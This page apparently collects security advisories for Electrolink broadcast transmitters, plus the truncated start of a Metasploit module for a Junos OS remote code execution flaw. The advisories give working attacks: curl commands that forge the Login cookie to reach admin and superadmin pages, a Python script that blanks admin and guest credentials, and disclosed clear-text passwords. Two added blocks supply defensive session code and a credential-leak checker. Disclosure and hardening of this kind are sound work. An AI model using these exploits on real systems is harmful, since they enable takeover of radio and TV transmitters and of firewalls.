<pre><code><br />Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters' needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state-of-the-art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the-art DAB modulator with excellent performances;<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust design<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The device allows an unauthenticated attacker to bypass<br />authentication and modify the Cookie to reveal hidden pages<br />that allow more critical operations on the transmitter.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5794<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5794.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/home.htm" | findstr /spina:d "admin"<br />33:<a class="linkm admin" href="/setting.htm">Setting & Status</a><br />34:<a class="linkm admin" href="/lan.htm">Setting lan</a><br />35:<a class="linkm admin" href="/snmp.htm">Setting snmp</a><br />36:<a class="linkm admin" href="/mail.htm">Setting e-mail</a><br />37:<a class="linkm admin" href="/login.htm">Setting login</a><br />38:<a class="linkm admin superadmin" href="/admin.htm">Setting admin</a><br />39:<a class="linkm admin superadmin" href="/terminal.htm">Terminal</a><br />...<br />C:\>curl -s "http://192.168.150.77:8888/admin.htm" -H "Cookie: Login=ZSL"<br />C:\>curl -s "http://192.168.150.77:8888/terminal.htm" -H "Cookie: Login=ZSL"<br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter Vertical Privilege Escalation<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters' needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state-of-the-art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the-art DAB modulator with excellent performances;<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust design<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The application suffers from a privilege escalation<br />vulnerability. An attacker can escalate their privileges by<br />poisoning the Cookie from GUEST to ADMIN to effectively<br />become Administrator, or poisoning it to ZSL to become Super<br />Administrator.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5793<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5793.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/mail.htm" -H "Cookie: Login=ADMIN" #changed Login=GUEST<br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br />#<br /># Electrolink FM/DAB/TV Transmitter Remote Authentication Removal<br />#<br />#<br /># Vendor: Electrolink s.r.l.<br /># Product web page: https://www.electrolink.com<br /># Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /># 500W, 1kW, 2kW Medium DAB Transmitter<br /># 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /># 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /># 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /># 15W - 40kW Digital FM Transmitter<br /># BI, BIII VHF TV Transmitter<br /># 10W - 5kW UHF TV Transmitter<br /># Web version: 01.09, 01.08, 01.07<br /># Display version: 1.4, 1.2<br /># Control unit version: 01.06, 01.04, 01.03<br /># Firmware version: 2.1<br />#<br /># Summary: Since 1990 Electrolink has been dealing with design and<br /># manufacturing of advanced technologies for radio and television<br /># broadcasting. The most comprehensive products range includes: FM<br /># Transmitters, DAB Transmitters, TV Transmitters for analogue and<br /># digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br /># DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br /># switches, Manual patch panels, RF power meters, Rigid line and<br /># accessories. A professional solution that meets broadcasters' needs<br /># from small community television or radio to big government networks.<br />#<br /># Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br /># touch-screen display and in-built state-of-the-art DAB modulator,<br /># EDI input and GPS receiver. All transmitters are equipped with a<br /># state-of-the-art DAB modulator with excellent performances;<br /># self-protected and self-controlled amplifiers ensure trouble-free<br /># non-stop operation.<br />#<br /># 100W, 500W, 1kW and 2kW power range available on compact 2U and<br /># 3U 19" frame. Built-in stereo coder, touch screen display and<br /># efficient low noise air cooling system. Available models: 3kW,<br /># 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br /># with fully broadband solid state amplifiers and an efficient<br /># low-noise air cooling system.<br />#<br /># FM digital modulator with excellent specifications, built-in<br /># stereo and RDS coder. Digital deviation limiter together with<br /># ASI and SDI inputs are available. These transmitters are ready<br /># for ISOFREQUENCY networks.<br />#<br /># Available for VHF BI and VHF BIII operation with robust design<br /># and user-friendly local and remote control. Multi-standard UHF<br /># TV transmitters from 10W up to 5kW with efficient low noise air<br /># cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br /># and ISDB-Tb available.<br />#<br /># Desc: The application is vulnerable to an unauthenticated<br /># parameter manipulation that allows an attacker to set the<br /># credentials to blank, giving her access to the admin panel.<br /># Also vulnerable to account takeover and arbitrary password<br /># change.<br />#<br /># Tested on: Mbedthis-Appweb/12.5.0<br /># Mbedthis-Appweb/12.0.0<br />#<br />#<br /># Vulnerability discovered by Neurogenesia<br /># Macedonian Information Security Research & Development Laboratory<br /># Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5792<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php<br />#<br />#<br /># 30.06.2023<br />#<br />#<br /><br /><br />import datetime<br />import requests<br /><br />dt = datetime.datetime.now()<br />dt = dt.strftime('%d.%m.%Y %H:%M:%S')<br />nul = ''<br /><br />print('Starting transmitter exploit at', dt)<br /><br />ip = input('Enter transmitter ip: ')<br />if 'http' not in ip:<br /> ip = 'http://' + ip<br /><br />ep = '/login.htm'<br />url = ip + ep<br /><br />signature = {'Accept-Encoding' : 'gzip, deflate',<br /> 'Accept-Language' : 'ku-MK,en;q=0.1806',<br /> 'User-Agent' : 'Broadcastso/B.B',<br /> 'Connection' : 'keep-alive'<br /> }<br /># ----------------- Line breaker v0.17 -----------------<br />postd = { 'adminuser' : nul,<br /> 'guestuser' : nul,<br /> 'adminpassword' : nul,<br /> 'guestpassword' : nul<br /> }<br /><br />print('Removing security control...')<br />r = requests.post(url, data = postd, headers = signature)<br />if r.status_code == 200:<br /> print('Done. Go and "Login".')<br />else:<br /> print('Error')<br />exit(-4)<br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters' needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state-of-the-art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the-art DAB modulator with excellent performances;<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust design<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The transmitter is vulnerable to an authentication bypass<br />vulnerability affecting the Login Cookie. An attacker can set<br />the Login Cookie to any value other than 'NO' and gain<br />full system access.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5791<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"<br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters' needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state-of-the-art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the-art DAB modulator with excellent performances;<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust design<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The device is vulnerable to a disclosure of clear-text<br />credentials in controlloLogin.js that can allow security<br />bypass and system access.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5790<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"<br />function verifica() {<br /> var user = document.getElementById('user').value;<br /> var password = document.getElementById('password').value;<br /><br /> //alert(user);<br /><br /> if(user=='admin' && password=='cozzir'){<br /> SetCookie('Login','OK',exp);<br /> window.location.replace("FrameSetCore.html");<br /> }else{<br /> SetCookie('Login','NO',exp);<br /> window.location.replace("login.html");<br /> }<br />}<br /></code></pre>
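The four Electrolink cookie advisories above (ZSL-2023-5794, 5793, 5791, 5790) and the authentication-removal script (ZSL-2023-5792) all come down to one design flaw: the role is decoded from the value of a client-supplied `Login` cookie, and the credential check itself runs in the browser. The block below is an added example, not Electrolink code and not part of any of the advisories. It models the cookie-trusting authorisation the advisories describe (`legacy_authorize`, whose exact value-to-role mapping is reconstructed from the observed behaviour and is an assumption) beside a server-side session model that fixes it, and adds a guarded replacement for the `login.htm` settings POST. The page list and the `admin`/`superadmin` classes come from the `home.htm` listing on the page; the session store, the token format and the function names are this example's own.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Required role per page, taken from the class attributes in the home.htm
# listing: 'admin' pages vs. 'admin superadmin' pages.
PAGE_ROLE = {
    "/home.htm": "guest",
    "/setting.htm": "admin",
    "/lan.htm": "admin",
    "/snmp.htm": "admin",
    "/mail.htm": "admin",
    "/login.htm": "admin",
    "/admin.htm": "superadmin",
    "/terminal.htm": "superadmin",
}
ROLE_RANK = {"guest": 0, "admin": 1, "superadmin": 2}


def parse_cookie(header: str) -> Dict[str, str]:
    """Minimal Cookie header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    out: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            out[name.strip()] = value.strip()
    return out


def legacy_authorize(cookie_header: str, page: str) -> bool:
    """The cookie-trusting model the advisories describe (assumed mapping,
    reconstructed from the observed behaviour): any Login value other
    than 'NO' counts as logged in, and 'ZSL' unlocks the superadmin pages."""
    login = parse_cookie(cookie_header).get("Login", "NO")
    if login == "NO":
        return False
    role = {"GUEST": "guest", "ZSL": "superadmin"}.get(login, "admin")
    return ROLE_RANK[role] >= ROLE_RANK[PAGE_ROLE.get(page, "superadmin")]


class SessionStore:
    """Server-side sessions: the cookie carries only a random token, and
    the role is looked up on the server, never decoded from the cookie."""

    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}                     # token -> role
        self.credentials: Dict[str, Tuple[bytes, bytes]] = {}  # user -> (salt, hash)

    def login(self, role: str) -> str:
        # Called only after the server itself has verified the credentials;
        # a 32-byte random token cannot be guessed or constructed.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = role
        return token

    def role_for(self, cookie_header: str) -> Optional[str]:
        token = parse_cookie(cookie_header).get("Login", "").encode()
        for stored, role in self._sessions.items():
            if hmac.compare_digest(stored.encode(), token):  # constant-time
                return role
        return None

    def authorize(self, cookie_header: str, page: str) -> bool:
        role = self.role_for(cookie_header)
        if role is None:
            return False
        needed = PAGE_ROLE.get(page, "superadmin")  # unknown page: most restrictive
        return ROLE_RANK[role] >= ROLE_RANK[needed]


def update_credentials(store: SessionStore, cookie_header: str, form: Dict[str, str]) -> bool:
    """Guarded replacement for the unauthenticated login.htm POST: requires
    an admin session, refuses blank user names or passwords instead of
    silently clearing them, and stores salted hashes rather than values
    that get echoed back into the page's input attributes."""
    if not store.authorize(cookie_header, "/login.htm"):
        return False
    pairs = (("adminuser", "adminpassword"), ("guestuser", "guestpassword"))
    if any(not form.get(key, "").strip() for pair in pairs for key in pair):
        return False
    for user_key, pw_key in pairs:
        salt = secrets.token_bytes(16)
        digest = hashlib.pbkdf2_hmac("sha256", form[pw_key].encode(), salt, 200_000)
        store.credentials[form[user_key]] = (salt, digest)
    return True
```

With the legacy model a forged `Login=ZSL` opens `/terminal.htm`; with `SessionStore` only a token the server minted after its own credential check maps to a role, and the mapping is fixed on the server, so neither `Login=ADMIN` nor `Login=ZSL` means anything. The `Login` cookie name is kept only to match the advisories; it should additionally be set `HttpOnly` and, where the device supports TLS, `Secure`.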
<pre><code><br />Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters' needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state-of-the-art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the-art DAB modulator with excellent performances;<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust design<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The device is vulnerable to a disclosure of clear-text<br />credentials in login.htm and mail.htm that can allow security<br />bypass and system access.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5789<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5789.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"<br />55:<td class=cd31>Admin password</td><br />56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td><br />63:<td class=cd31>Guest password</td><br />64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td><br />C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"<br />93:<td class=cd31>Server password</td><br />94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td><br /></code></pre>
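Both credential-disclosure advisories (ZSL-2023-5790 for controlloLogin.js and ZSL-2023-5789 for login.htm/mail.htm) can be caught by a static check over the pages a device serves: a password input whose `value` attribute is pre-filled, or a client-side script that compares the password against a string literal. The block below is an added example, not part of either advisory or of Electrolink's firmware. The HTML and JavaScript samples are constructed to mirror the `findstr` output and the `verifica()` function shown on the page, with placeholder secrets; the checker reports field names and secret lengths only, so its own output does not leak what it finds.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Tuple

# Constructed samples mirroring the page's findings; secrets are placeholders.
SAMPLE_LOGIN_HTM = """
<tr><td class=cd31>Admin user</td>
<td class=cd32><input type=text name=adminuser value="admin" maxlength="30"/></td></tr>
<tr><td class=cd31>Admin password</td>
<td class=cd32><input type=password name=adminpassword value="PLACEHOLDER-ADMIN" tabindex=2 style="width: 95%" maxlength="30"/></td></tr>
<tr><td class=cd31>Guest password</td>
<td class=cd32><input type=password name=guestpassword value="" tabindex=4 maxlength="30"/></td></tr>
"""
SAMPLE_MAIL_HTM = """
<tr><td class=cd31>Server password</td>
<td class=cd32><input type=password name=password value="PLACEHOLDER-SMTP" tabindex=4 maxlength="40"/></td></tr>
"""
SAMPLE_LOGIN_JS = """
function verifica() {
 var user = document.getElementById('user').value;
 var password = document.getElementById('password').value;
 if(user=='admin' && password=='PLACEHOLDER-JS'){ SetCookie('Login','OK',exp); }
}
"""


class PasswordValueAuditor(HTMLParser):
    """Collects <input type=password> elements whose value attribute is
    non-empty, i.e. the server wrote the stored secret into the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Tuple[str, int]] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "password" and a.get("value"):
            # Report the field name and the length only; never log the secret.
            self.findings.append((a.get("name", "?"), len(a["value"])))


def find_prefilled_passwords(html: str) -> List[Tuple[str, int]]:
    """(field name, secret length) for every pre-filled password input."""
    auditor = PasswordValueAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# A password compared against a string literal in client-side code means
# the secret is shipped to every visitor who fetches the script.
JS_LITERAL_CHECK = re.compile(r"""password\s*==\s*(['"])(.+?)\1""")


def find_js_literal_passwords(js: str) -> List[int]:
    """Lengths of password literals compared in client-side code."""
    return [len(m.group(2)) for m in JS_LITERAL_CHECK.finditer(js)]


def audit(pages: Dict[str, str], scripts: Dict[str, str]) -> Dict[str, list]:
    """Run both checks over name -> content mappings; only hits are reported."""
    report: Dict[str, list] = {}
    for name, html in pages.items():
        hits = find_prefilled_passwords(html)
        if hits:
            report[name] = hits
    for name, js in scripts.items():
        lengths = find_js_literal_passwords(js)
        if lengths:
            report[name] = lengths
    return report


if __name__ == "__main__":
    result = audit({"login.htm": SAMPLE_LOGIN_HTM, "mail.htm": SAMPLE_MAIL_HTM},
                   {"controlloLogin.js": SAMPLE_LOGIN_JS})
    for name, hits in result.items():
        print(f"{name}: {hits}")
```

The fix on the server side is the complement of the check: render password fields with an empty `value` (or a fixed sentinel the form handler treats as "unchanged") and move the credential comparison out of the script into the server, as in the session example earlier on this page.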
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'unix_crypt'<br />require 'net/ssh'<br />require 'net/ssh/command_stream'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::SSH<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Junos OS PHPRC Environment Variable Manipulation RCE',<br /> 'Description' => %q{<br /> This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls<br /> and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin<br /> by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being<br /> 'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP<br /> function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling<br /> allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses<br /> data:// to provide a file inline which includes the base64 encoded PHP payload.<br /><br /> By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a<br /> datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated<br /> to the J-Web application, in order to overwrite the the root password hash. If there is no user<br /> authenticated to the J-Web application this method will not work. 
